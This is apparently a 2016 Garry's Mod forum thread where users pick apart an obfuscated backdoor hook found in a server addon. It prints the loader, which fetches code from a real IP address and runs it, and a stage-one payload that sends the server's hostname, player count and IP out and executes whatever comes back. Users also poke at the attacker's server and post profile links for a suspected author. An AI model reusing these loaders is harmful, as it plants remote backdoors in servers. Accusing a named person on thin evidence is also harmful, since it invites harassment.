So I'm doing a job for someone and one of their addons on the server has this hook:
[code]
hook.Add("\84\104\105\110\107","\67\67\67", function() RunString("function util.ABCDEFGEEZGEEGZGE( data ) local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' if !data then return end data = string.gsub(data, '[^'..b..'=]', '') return (data:gsub('.', function(x) if (x == '=') then return '' end local r,f='',(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 && '1' || '0') end return r; end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x) if (#x ~= 8) then return '' end local c=0 for i=1,8 do c=c+(x:sub(i,i)=='1' && 2^(8-i) || 0) end return string.char(c) end)) end http.Fetch(string.reverse(util.ABCDEFGEEZGEEGZGE('cGhwLjFlZ2F0cy9lcm9jL3VlZnVhY2FyZC8wOC4xMzIuNDcuNzMxLy86cHR0aA=')),function(body,len,headers,code) RunString(body) end)")
hook.Remove("\84\104\105\110\107","\67\67\67") end)[/code]
Can anyone help me find out what this is? It looks suspicious as shit
could it be, that it's inside sh_blockbelier.lua?
i've seen the name util.ABCDEFGEEZGEEGZGE once and then it was an payload from an french PrisonRP Server.
first it loaded an second resolve function for stage 2, collected playercount, ip and hostname and then it just resovled to an empty print. Just comment it out and if the addon still works, up you go.
I'll take a crack at it.
So far I've got:
[lua]
local code = [[
function util.ABCDEFGEEZGEEGZGE( data )
local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
if !data then return end
data = string.gsub( data, '[^'..b..'=]', '' )
return ( data:gsub( '.', function( x )
if ( x == '=' ) then return '' end
local r, f='', ( b:find( x )-1 )
for i=6, 1, -1 do
r=r..( f%2^i-f%2^( i-1 )>0 && '1' || '0' )
end
return r;
end ):gsub( '%d%d%d?%d?%d?%d?%d?%d?', function( x )
if ( #x ~= 8 ) then return '' end
local c=0 for i=1, 8 do
c = c+( x:sub( i, i ) == '1' && 2^( 8-i ) || 0 )
end
return string.char( c ) end ) )
end
http.Fetch( string.reverse( util.ABCDEFGEEZGEEGZGE( 'cGhwLjFlZ2F0cy9lcm9jL3VlZnVhY2FyZC8wOC4xMzIuNDcuNzMxLy86cHR0aA=' ) ), function( body, len, headers, code )
RunString( body )
end )
]]
hook.Add("Think", "CCC", function()
RunString(code)
hook.Remove("Think", "CCC")
end)
[/lua]
All it's doing is hiding the URL really. Here, I'll grab the URL by running the function now
[editline]a[/editline]
[url]http://137.74.231.80/dracaufeu/core/stage1.php[/url]
[QUOTE=Tomelyr;50840914]could it be, that it's inside sh_blockbelier.lua?
i've seen the name util.ABCDEFGEEZGEEGZGE once and then it was an payload from an french PrisonRP Server.
first it loaded an second resolve function for stage 2, collected playercount, ip and hostname and then it just resovled to an empty print. Just comment it out and if the addon still works, up you go.[/QUOTE]
Yeah it still works without the hook but this is more a curiosity thing.
I remember way back there used to be code similar to this in some workshop addon that collected data to find out who's using the addon
eventually does this
[CODE]
http.Fetch( "http://137.74.231.80/dracaufeu/core/stage1.php", function( body, len, headers, code )
RunString( body )
end )
[/CODE]
Appreciate it guys
[editline]6th August 2016[/editline]
[QUOTE=timz9;50840934]eventually does this
[CODE]
http.Fetch( "http://137.74.231.80/dracaufeu/core/stage1.php", function( body, len, headers, code )
RunString( body )
end )
[/CODE][/QUOTE]
So it is running code through the http, huh
Multistaged as well
[editline]6th August 2016[/editline]
[code]
// Stage One
timer.Create( "LaunchGet", 23, 0, function() local a = { n = GetHostName(), nb = tostring(#player.GetAll()), i = game.GetIPAddress() } http.Post( "http://137.74.231.80/dracaufeu/core/stage2.php", a, function( body, len, headers, code ) RunString(body) end) end)
[/code]
He didn't add a second stage, guess that would have been eventually
Is it possible that it only serves the second stage if the parameters are valid?
After reading the stages, i believe it's meant to be a thing where he makes specific hacks for a given IP address
[editline]6th August 2016[/editline]
eg, give community 1 this hack, community 2 this one, etc
When served valid parameters (specifically a = { n = "Eat my ass.", nb = "999", i = "127.0.0.1" }), server responds with "PrintMessage(10,'')".
Out of curiosity how do you guys decode these sorts of things? At best google shows me it's a bytecode but I'm not actually sure what to do with that
[QUOTE=solid_jake;50840998]Out of curiosity how do you guys decode these sorts of things? At best google shows me it's a bytecode but I'm not actually sure what to do with that[/QUOTE]
Started by figuring out the hook names, you can just print the string to get the unescaped values. Then I formatted the code block, and realized i didn't need to understand it to get the URL; I just fed the function into lua and instead of http.Fetch i print()'d it
[editline]6th August 2016[/editline]
[QUOTE=timz9;50840996]Interedasting [url=http://137.74.231.80/dracaufeu/core/]http://137.74.231.80/dracaufeu/core/[/url]
[url]http://137.74.231.80/dracaufeu/core/ajax/error_log[/url][/QUOTE]
This is god tier. I'm guessing he posts to those files to create and remove payloads. I bet he doesn't auth either.
Seems to use a database to store payloads?
What do you want to bet it's secured correctly?
This isn't from a ScriptFodder addon is it?
Seems dodgy as shit and I have seen other DRM type code very similar to this one (Bus System - ElGringo) get removed because of it.
LMAO he doesn't auth
[QUOTE=zerf;50841018]LMAO he doesn't auth[/QUOTE]
[t]http://i.imgur.com/HbZrLMC.png[/t]
god-tier copy+paste detected
[IMG]http://i.imgur.com/bxHpsgF.png[/IMG]
>Redirect to BaguetteRP
looks like we cracked the mystery; a frenchie has compromised some servers
[QUOTE=The Commander;50841017]This isn't from a ScriptFodder addon is it?
Seems dodgy as shit and I have seen other DRM type code very similar to this one (Bus System - ElGringo) get removed because of it.[/QUOTE]
It's not from an SF addon no, it's from a privately made addon that someone had "full permission to post publically"
Main server file had this in it, had a feeling it was no good, and look at that.
:snip:
[editline]aww[/editline]
Update: server is closed :(
Which one of you told him? Or does he monitor his server 24/7...
hey if whoever made this is reading this thread, you are terrible and years late l m a o
[QUOTE=zerf;50841034]:snip:
[editline]aww[/editline]
Update: server is closed :(
Which one of you told him? Or does he monitor his server 24/7...[/QUOTE]
Maybe he just noticed the mass amounts of queries
Fun time over. Well [B]now[/B] what are we going to do?
[QUOTE=MadParakeet;50841121]Fun time over. Well [B]now[/B] what are we going to do?[/QUOTE]
Let's masturbate
This might be considered witch hunting, and I'm not saying this is his doing in the slightest, just throwing the possibility out for future reference - this French dude who was viewing this thread both before and after the shit was removed claims "I learn Lua, C++, and PHP/HTML." He hasn't posted since September 1, 2015, but is somehow now logged in and viewing the thread. [B]Maybe it's not him,[/B] but it very well could be (In the end, all we have is the shitty code and the people viewing the thread. That's not really proof of anything.), if it is the case that someone alerted him to this thread.
[URL="http://steamcommunity.com/id/wareb/"]http://steamcommunity.com/id/wareb/[/URL]
[URL="https://facepunch.com/member.php?u=657037"]https://facepunch.com/member.php?u=657037[/URL]
In case his profile goes private -
[t]http://i.imgur.com/bsh4Oe4.png[/t]
He also does appear to have owned a BaguetteRP server in the past, for what it's worth
[QUOTE=timz9;50841135]Let's masturbate
This might be considered witch hunting, and I'm not saying this is his doing in the slightest, just throwing the possibility out for future reference - this French dude who was viewing this thread both before and after the shit was removed claims "I learn Lua, C++, and PHP/HTML." He hasn't posted since September 1, 2015, but is somehow now logged in and viewing the thread. [B]Maybe it's not him,[/B] but it very well could be (In the end, all we have is the shitty code and the people viewing the thread. That's not really proof of anything.), if it is the case that someone alerted him to this thread.
[URL="http://steamcommunity.com/id/wareb/"]http://steamcommunity.com/id/wareb/[/URL]
[URL="https://facepunch.com/member.php?u=657037"]https://facepunch.com/member.php?u=657037[/URL]
In case his profile goes private -
[t]http://i.imgur.com/bsh4Oe4.png[/t]
He also does appear to have owned a BaguetteRP server in the past, for what it's worth[/QUOTE]
Hi
we have same PB here [URL="https://www.mtxserv.fr/forums/threads/keycard-system-scp.8330/page-2"]https://www.mtxserv.fr/forums/threads/keycard-system-scp.8330/page-2[/URL]
this guys [url]http://steamcommunity.com/id/Phacocher02[/url] have add a addons
and I see this guys @Phacocher02 to friend liste @Wareb
and I see same @Wareb poste [URL="https://www.mtxserv.fr/forums/threads/keycard-system-scp.8330/page-4"]here[/URL]
sorry for my bad GR
Sorry, you need to Log In to post a reply to this thread.
